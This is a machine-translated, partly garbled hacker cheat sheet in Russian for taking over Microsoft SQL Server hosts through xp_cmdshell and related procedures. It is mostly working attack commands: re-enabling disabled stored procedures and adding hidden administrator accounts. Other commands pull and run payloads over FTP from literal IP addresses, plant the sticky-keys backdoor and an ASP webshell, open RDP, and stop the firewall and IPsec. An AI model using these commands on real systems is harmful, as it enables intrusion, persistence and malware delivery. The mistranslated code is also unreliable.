Приказы на ремонт 1433 года
net user SQLДebugger list /add
net localgroup administrators SQLDebugger /add
Сообщение об ошибке: Не удалось найти сохранённую процедуру 'master.. xp_cmdshell'。
Метод ремонта: очень общий, на самом деле другие 126 127 можно ремонтировать вместе,
Кроме того xplog70.dll всё остальное можно исправить этой командой
xp_cmdshell новые методы восстановления
Шаг 1: Удалить:
Процедура сброса sp_addextendedproc
Процедура сброса sp_oacreate
Исполнительный sp_dropextendedproc 'xp_cmdshell'
Сервер: Msg 3701, уровень 11, состояние 5, линия 1
Невозможно удалить процесс 'sp_addextendedproc', так как он отсутствует в системном каталоге.
Сервер: Msg 3701, уровень 11, состояние 5, процедура sp_dropextendedproc, строка 18
Невозможно удалить процесс 'xp_cmdshell', потому что он отсутствует в системном каталоге.
Шаг 2: Восстановление:
DBCC addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc («xp_cmdshell», «xplog70.dll»)
Прямое восстановление, независимо от того, существует ли sp_addextendedproc или нет
xplog70.dll исправления:
Сообщение об ошибке: DLL xplog70.dll или одна из DLL, на которые ссылается DLL, не могла быть смонтирована. Причина: 126 (Указанный модуль не найден.) )。
Исправьте XPLOG70.DLL (сначала проверьте резервную папку \x86\bin с этим файлом, а затем замените следующую директорию)
Шаг 1
Исполнительный sp_dropextendedproc 'xp_cmdshell'
Шаг 2
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Не удалось найти сохранённую процедуру 'мастер... xp_cmdshell'。
Шаг 1:
Процедура создания sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (владелец.) Название функции для вызова
*/
@dllname varchar(255)/* имя DLL, содержащего функцию */
как
Запустил implicit_transactions
если @@trancount > 0
Начало
raiserror (15002,-1,-1,'sp_addextendedproc')
Возвращение (1)
Конец
DBCC addextendedproc(@functname, @dllname)
Возврат (0) -- sp_addextendedproc
ВПЕРЁД
Шаг 2:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL Server блокировал доступ к процессу 'sys.xp_cmdshell' компонента 'xp_cmdshell', поскольку этот компонент был отключён в рамках настройки безопасности этого сервера. Системные администраторы могут включить 'xp_cmdshell', используя sp_configure. Для получения дополнительной информации о включении xp_cmdshell см. Периферийный конфигуратор приложений в серии онлайн-книг SQL Server.
; EXEC sp_configure 'показать расширенные параметры', 1 --
; ПЕРЕНАСТРОЙТЕ С ПОМОЩЬЮ OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; ПЕРЕНАСТРОЙТЕ С ПОМОЩЬЮ OVERRIDE --
; EXEC sp_configure 'показать расширенные параметры', 0 --
Удалите опасное хранилище SQL:
ПРОЦЕДУРА СБРОСА sp_makewebtask
Исполнительный мастер... sp_dropextendedproc xp_cmdshell
Исполнительный мастер... sp_dropextendedproc xp_dirtree
Исполнительный мастер... sp_dropextendedproc xp_fileexist
Исполнительный мастер... sp_dropextendedproc xp_terminate_process
Исполнительный мастер... sp_dropextendedproc sp_oamethod
Исполнительный мастер... sp_dropextendedproc sp_oacreate
Исполнительный мастер... sp_dropextendedproc xp_regaddmultistring
Исполнительный мастер... sp_dropextendedproc xp_regdeletekey
Исполнительный мастер... sp_dropextendedproc xp_regdeletevalue
Исполнительный мастер... sp_dropextendedproc xp_regenumkeys
Исполнительный мастер... sp_dropextendedproc xp_regenumvalues
Исполнительный мастер... sp_dropextendedproc sp_add_job
Исполнительный мастер... sp_dropextendedproc sp_addtask
Исполнительный мастер... sp_dropextendedproc xp_regread
Исполнительный мастер... sp_dropextendedproc xp_regwrite
Исполнительный мастер... sp_dropextendedproc xp_readwebtask
Исполнительный мастер... sp_dropextendedproc xp_makewebtask
Исполнительный мастер... sp_dropextendedproc xp_regremovemultistring
Исполнительный мастер... sp_dropextendedproc sp_OACreate
ПРОЦЕДУРА СБРОСА sp_addextendedproc
Восстановление расширенных сохранённых процедур
Сначала восстановите sp_addextendedproc, и утверждение выглядит следующим образом:
Во-первых:
Процедура создания sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (владелец.) имя функции для вызова */ @dllname varchar(255)/* имя DLL, содержащей функцию */ как
Запустил implicit_transactions
если @@trancount > 0
Начало
raiserror (15002,-1,-1,'sp_addextendedproc')
Возвращение (1)
Конец
DBCC addextendedproc(@functname, @dllname)
Возврат (0) -- sp_addextendedproc
ВПЕРЁД
Во-вторых:
Используйте мастера
Исполнительный sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
Исполнительный sp_addextendedproc xp_dirtree,'xpstar.dll'
Исполнительный sp_addextendedproc xp_enumgroups,'xplog70.dll'
Исполнительный sp_addextendedproc xp_fixeddrives,'xpstar.dll'
Исполнительный sp_addextendedproc xp_loginconfig,'xplog70.dll'
Исполнительный sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
Исполнительный sp_addextendedproc xp_getfiledetails,'xpstar.dll'
Исполнительный sp_addextendedproc sp_OACreate,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OADestroy,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OAMethod,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OASetProperty,'odsole70.dll'
Исполнительный sp_addextendedproc sp_OAStop,'odsole70.dll'
Исполнительный sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regdeletekey,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regenumvalues,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regread,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
Исполнительный sp_addextendedproc xp_regwrite,'xpstar.dll'
Исполнительный sp_addextendedproc xp_availablemedia,'xpstar.dll'
Удалите оператор, который расширяет сохранённую процедуру xp_cmdshell:
Исполнительный sp_dropextendedproc 'xp_cmdshell'
Восстановить sql-оператор cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Откройте оператор CMDSHELL SQL
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Определите, существует ли расширение хранения
выберите count(*) из master.dbo.sysobjects, где xtype='x' и name='xp_cmdshell'
Результат возврата — 1, и всё в порядке.
Восстановить xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; выберите count(*) из master.dbo.sysobjects, где xtype='x' и name='xp_cmdshell'
Результат возврата — 1, и всё в порядке.
В противном случае загружайте xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Блокировать sql-оператор cmdshell
sp_dropextendedproc «xp_cmdshell
Один. Изменение метода пароля SA:
После подключения к инструменту комплексного использования SQL выполните команду:
exec sp_password NULL, 'новый пароль', 'sa'
(Подсказка: используйте с осторожностью!)
Два. Просто исправьте слабый пароль.
Метод 1: Запрос к сплиттеру после подключения:
если существует (выберите * из
dbo.sysobjects, где id = object_id(N'[dbo].[ xp_cmdshell]') и
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
исполнительный sp_dropextendedproc N'[DBO]. [xp_cmdshell]'
ВПЕРЁД
Затем нажмите клавишу F5, чтобы выполнить команду
Метод 2: Запрос после подключения сплиттера
Первый шаг — выполнить: использовать мастер
Шаг 2: sp_dropextendedproc 'xp_cmdshell'
Затем нажмите клавишу F5, чтобы выполнить команду
DLL xpsql70.dll или одна из DLL, на которые ссылается DLL, не может быть монтирована. Причина 126 (Указанный модуль не найден. )
Метод восстановления: после запроса к соединению сплиттера,
Шаг 1: sp_dropextendedproc «xp_cmdshell»
Шаг 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Функция xp_cmdshell недоступна в библиотечном xpweb70.dll. Причина: 127 (Указанная программа не найдена.) )
Метод восстановления: после запроса к соединению сплиттера,
Шаг 1 Исполнение: исполнительный sp_dropextendedproc 'xp_cmdshell'
Шаг 2: исполнительный sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Затем нажмите клавишу F5, чтобы выполнить команду
Если ни один из вышеуказанных методов не восстановить, пожалуйста, попробуйте добавить аккаунт напрямую с помощью следующих методов:
После запроса к соединению сплиттера,
Система 2000servser:
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP или серверная система 2003: ошибка 126! Порядок
Declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
объявить @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server блокировал доступ к процессу 'sys.xp_cmdshell' компонента 'xp_cmdshell', поскольку этот компонент был отключён в рамках настройки безопасности этого сервера. Системные администраторы могут включить 'xp_cmdshell', используя sp_configure. Для получения дополнительной информации о включении xp_cmdshell см. Периферийный конфигуратор приложений в серии онлайн-книг SQL Server.
Операторы, выполняемые анализатором:
EXEC sp_configure «показывать расширенные опции», 1; РЕКОНФИГУРИРОВАТЬ; EXEC sp_configure 'xp_cmdshell', 1; РЕКОНФИГУРИРОВАТЬ;
Иногда, при выполнении вышеуказанных операторов с помощью соединения с отстранением запроса, сохранённая процедура не может быть найдена sp_addextendedproc
Обходной путь:
Процедура создания sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (владелец.) Название функции для вызова */
@dllname varchar(255)/* имя DLL, содержащего функцию */
как
Запустил implicit_transactions
если @@trancount > 0
Начало
raiserror (15002,-1,-1,'sp_addextendedproc')
Возвращение (1)
Конец
DBCC addextendedproc(@functname, @dllname)
Возврат (0) -- sp_addextendedproc
ВПЕРЁД
Этот код вставляется в сплиттер запросов и выполняется
Исследователь:
c:\windows\explorer.exe
Посмотреть оглавление
Исполнительный master.dbo.xp_subdirs 'C:\'
Список дисков
Исполнительный мастер... xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor версии 5.00 >3389.reg
эхо. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Включено"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
эхо "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
эхо [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
эхо [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
эхо "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
эхо "Start"=dword:00000002 >>3389.reg
эхо [HKEY_USERS\. DEFAULT\Keyboard Layout\Переключатель] >>3389.reg
эхо «Горячая клавиша»=«1» >>3389.reg
эхо [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
эхо [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Открыть 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Пропуск 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Посмотрите порт 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Обычная задняя дверь CMD
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K идёт напрямую на PS Mar
Исполнительный мастер... xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Выберите * из OpenRowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','Select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP напрямую на лошадях PS
Исполнительный мастер... xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Выберите * из OpenRowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','Select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Сменить команду бэкдора
объявить @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
Exec sp_oamethod @o, 'копиировать файл',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
объявить @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
Exec sp_oamethod @o, 'копировать файл',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Скопировать C:\Windows\explorer.exe C:\Windows\system32\sethc.exe
Скопировать c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
объявить @o int
исполнительный sp_oacreate 'wscrip remove t.shell', @o выход
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX — это команда, которую вы хотите выполнить
Запишите значение, указанное в ключе, указанном в реестре), используя метод (запишите bbb в ключе HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
ИСПОЛНИТЕЛЬНЫЙ мастер... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaЗначение',
@type='REG_SZ',
@value='bbb'
@echo откройте 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo получите gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Сначала скопируйте ftp.exe в каталог WMPUB
@echo CD C:\wmpub\>c:\wmpub\in.bat&&@echo FTP -S:C:\WMpub\xiuxiu.txt>>c:\WMpub\in.bat
Open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSonnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL пишет предложение
исполнительный master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
Промоушен SA Sandbox Mode -----
----------------------
Исполнительный мастер... xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Выберите * из OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
СМЕНА 3389
Использованное предложение:
Вторжение
ИСПОЛНИТЕЛЬНЫЙ мастер... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Отладчик',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Восстановление
ИСПОЛНИТЕЛЬНЫЙ мастер... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Отладчик',
@type='REG_SZ',
@value=''
Захват изображений
ИСПОЛНИТЕЛЬНЫЙ мастер... xp_regwrite --- это редактирование реестра!
@rootkey='HKEY_LOCAL_MACHINE', ---Вот позиция!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----Это тоже позиция!
@value_name='Отладчик', --- это название стола!
@type=''REG_SZ', --- вот смысл письма!
@value='C:\WINDOWS\explorer.exe' ---- вот написанный материал!
Весь процесс заключается в использовании мастера: xp_regwrite этот компонент выполнен,
1.sql команду для запроса, был ли захвачен прикреплённый ключ реестра
Исполнительный мастер... xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql команда захватывает функцию закреплённых клавиш в реестре и заменяет её диспетчером задач (конечно, её можно заменить другими нужными командами)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Отладчик','REG_SZ',''C:\WINDOWS\system32\taskmgr.exe'
3.sql команда для удаления функции захвата прикреплённых ключей реестра защищает ваш сервер от эксплуатации другими
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL файлы записи
объявить @o int, @f int, @t int @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Создать("user", "test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Скрипты без эскалации NET
struser=wscrip для удаления t.arguments(0)
strpass=wscrip для удаления t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK")
oz="WinNT://"&lp. ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group)
Set od=ob.create("user",struser)
ОД. SetPassword strpass
ОД. SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
OE. Add(of. ADsPath)
Для каждого админа в oe. Участники
if struser=admin. Тогда название
WSCRIP удалил t.echo struser и «Успешно установлен!»
wscrip для удаления t.quit
конец, если
Далее
Wscrip удалите t.echo struser и «Установка пользователей не удалась!»
Сохраните вышеуказанное как пользователь. Файл VBS
Затем выполните: cscrip, чтобы удалить пароль имени пользователя user.vbs
Используя режим песочницы JET, вы можете решить проблемы, вызванные хранящимися процедурами, такими как XP_cmdshell и связанными динамическими библиотеками связей. По соображениям безопасности система по умолчанию не включает режим песочницы, поэтому xp_regwrite нужно включить режим песочницы:
Исполнительный master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1
Затем выполните команду песочницы, чтобы добавить тест пользовательского имени с паролем 1234 в систему:
Выберите * из OpenRowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','Select shell("cmd.exe /c net user test 1234 /add")')
Выберите * из OpenRowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
администраторы тестируют /добавить")')
Разные операционные системы имеют разные пути и требуют модификации в зависимости от ситуации:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Кроме того, в Microsoft SQL Server 2005 некоторые сохранённые процедуры по умолчанию закрыты и требуют команд для открытия:
Включите XP_cmdshell:
EXEC sp_configure «показывать расширенные опции», 1; РЕКОНФИГУРИРОВАТЬ; ИСПОЛНИТЕЛЬНЫЙ sp_configure
'xp_cmdshell', 1; РЕКОНФИГУРИРОВАТЬ;
Откройте 'OPENROWSET':
Exec sp_configure «Показать расширенные опции», 1; РЕКОНФИГУРИРОВАТЬ; Исполнительный sp_configure
«Ad hoc распределённые запросы»,1; РЕКОНФИГУРИРОВАТЬ;
Включите 'sp_oacreate':
Exec sp_configure «Показать расширенные опции», 1; РЕКОНФИГУРИРОВАТЬ; Исполнительный sp_configure
«Процедуры старой автоматизации», 1; РЕКОНФИГУРИРОВАТЬ;
Вот несколько ситуаций, когда команда выполнения при SA ошибочна:
1. DLL xpsql70.dll или DLL, на которую ссылается DLL, нельзя загрузить. Причина 126 (Указанный модуль не найден. )
Такая ситуация довольно распространена, ремонт прост и прост, но есть определённые условия. Если вы можете указать каталог в этом случае (в SQL Tools v2.0 есть функция каталога). Поздравляю с этим, ситуация с 80% можно исправить, если вы можете указать каталог, просто найдите путь xplog70.dll и выполните следующую команду.
Шаг 1
exec sp_dropextendedproc 'xp_cmdshell' (эта команда нужна для удаления оригинальной cmdshell, потому что она уже пошла не так)
Шаг 2
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXEC sp_configure «показать расширенные опции», 0 –
Конечно, это SQL-команда, выполняемая с помощью анализатора запросов. c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll на втором этапе — это путь xplog70.dll, этот путь довольно распространён, если на диске C его нет, можно найти другие буквы диска.
2. Не удалось найти функцию xp_cmdshell в библиотеке xpweb70.dll. Причина: 127 (Указанная программа не найдена.) )
На самом деле, это то же самое, что и вышеуказанные 126, то есть cmdshell неверен, если вы найдёте резервную копию xplog70.dll следуете вышеуказанному методу для исправления.
3. Не удалось найти сохранённую процедуру «мастер». xpcmdshell
В этом случае я вижу в Интернете, что метод таков:
Шаг 1: Удалить:
Процедура сброса sp_addextendedproc
Процедура сброса sp_oacreate
Исполнительный sp_dropextendedproc 'xp_cmdshell'
Шаг 2: Восстановление:
DBCC addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc («xp_cmdshell», «xplog70.dll»)
На самом деле, это всё равно то же, что и вышеописанное, если быть осторожным, вышеуказанный 126 127 не найдёт только сохранённую процедуру 'master:. xpcmdshell', потому что первым шагом является удаление сохранённой процедуры cmdshell. Так что в этом случае просто следуйте второму шагу выше.
4. Сообщение об ошибке: SQL Server заблокировал доступ к процессу 'sys.xp_cmdshell' компонента 'xp_cmdshell', потому что этот компонент был отключён в рамках настройки безопасности этого сервера. Системные администраторы могут включить 'xp_cmdshell', используя sp_configure. Для получения дополнительной информации о включении xp_cmdshell см. Периферийный конфигуратор приложений в серии онлайн-книг SQL Server.
Эта ситуация самая простая, потому что вам не нужно ни о чём думать, просто выполните следующую команду
; EXEC sp_configure 'показать расширенные параметры', 1 --
; ПЕРЕНАСТРОЙТЕ С ПОМОЩЬЮ OVERRIDE --
; EXEC sp_configure 'xp_cmdshell', 1 --
; ПЕРЕНАСТРОЙТЕ С ПОМОЩЬЮ OVERRIDE --
; EXEC sp_configure «показать расширенные опции», 0 –
После вышеуказанного исправления вы сможете выполнить команду cmd, и вы начнёте повышать мощность. Обычно я сначала проверяю IP, чтобы узнать, является ли это интранет, затем делаю REG-запрос HKLM\SYSTEM\CurrentControlSet\Control\Terminal "Server\WinStations\RDP-Tcp /v PortNumber" для проверки терминального порта, затем netstat –an, чтобы проверить, открыт ли терминал, и затем пользовательский пароль net user / Добавьте пользователя, а затем администраторов локальной сети пользователя /add. Если всё пойдёт хорошо, сервер выведет из строя. Но в процессе возникает много проблем.
1. Продвижение чистой мощности успешно проходит, но не может подключиться к терминалу. Существуют следующие ситуации
(1) Сервер находится в интранете.
(2) Скрининг TCP/IP.
Сначала выполните следующую команду cmd:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, экспортировать первую часть реестра для фильтрации TCP/IP
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, экспортировать вторую часть реестра для фильтрации TCP/IP
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip», экспортируя третье место в реестре по фильтрации TCP/IP
Затем возвращайтесь на диск C 1.reg, 2.reg, 3.reg, скачайте 1.reg, 2.reg 3.reg обратно на жёсткий диск для редактирования, найдите поле EnableSecurityFilters, чтобы узнать, равен ли ключ после dword 0000000, если 00000001, значит, администратор провёл фильтрацию tcp/ip, нужно просто изменить 1 на 0, 2. Рег и 3.reg делают те же изменения.
(3) Создать политику безопасности IP.
Выполните команду cmd: cmd /c net stop policyagent, чтобы остановить сервис IPSEC Services. Подключите терминал снова.
(4) Разрешение на вход в терминал, установленное администратором, может быть использовано только указанным пользователем.
(5) Файрвол. Выполните команду cmd: net stop alg /ynet stop sharedaccess
2. Появляется эскалация NET, и доступ отклоняется
Вы можете попробовать net1 user password /add Если net1 тоже запрещает доступ, можно скопировать shfit бэкдор и попытаться выполнить команду cmd: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
Скопировать c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Если запросить, скопируйте 1 файл, который оказывается успешным. Подключитесь к клеме и нажмите 5 shift, чтобы посмотреть, что появится. Играйте с Kaka Explorer, теперь просто добавляйте пользователя вручную.
3. Возникает эскалация сети с ошибкой отказа в доступе 5 (выделение)
В этом случае не нужно пробовать net1, можно попробовать копировать shift backdoor, если копирование подсказывает копировать файл 0, это доказывает, что он не успешен. Потом можно попробовать загрузить его, если сможешь загрузить, напрямую отправить не-сетевой инструмент для эскалации мощности, который вышел некоторое время назад, и добавить пользователя. Но большинство таких случаев нельзя загрузить, так что нужно подумать. Поскольку cmd можно выполнить, файл можно скачать через cmd в формате ftp, но суть ftp — возможность писать текст или пакетную обработку. Затем можно написать текст или пакет через SQL-оператор.
объявить @o int, @f int, @t int @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp-аккаунт'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp-пароль'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (нет скрипта эскалации сети) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
После успешного выполнения анализатора запросов на диске C появится 1.bat (если выполнение успешное, но диск C отсутствует, вы можете изменить папку на запись, потому что корневой каталог C-диска какого-то сервера запрещает запись).
Затем cmd запускает ftp -s:c:\1.bat
После этого вы скачаете скрипт эскалации без сети на FTP CFT-диска или напишете скрипт эскалации VBS напрямую
объявить @o int, @f int, @t int @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Затем cmd запускает cscrip, чтобы удалить t c:\1.vbs
4. Предыдущий ремонт ремонтируется для выполнения команд cmd, но после некоторых ремонтов появляются новые проблемы
(1) Сообщение: Во время выполнения xp_cmdshell произошла ошибка. Вызов 'CreateProcess' провалился с кодом ошибки '5'.
Ошибка 5 — это номер ошибки, вызванный системой, CreateProcess — это значение создания потока, эта генерация ошибок во многом связана с cmd.exe системных файлов: одна из них — удаление cmd, другая — уменьшение разрешения cmd.
SQL для проверки терминальных портов и статуса открытости:
Исполнительный мастер... xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
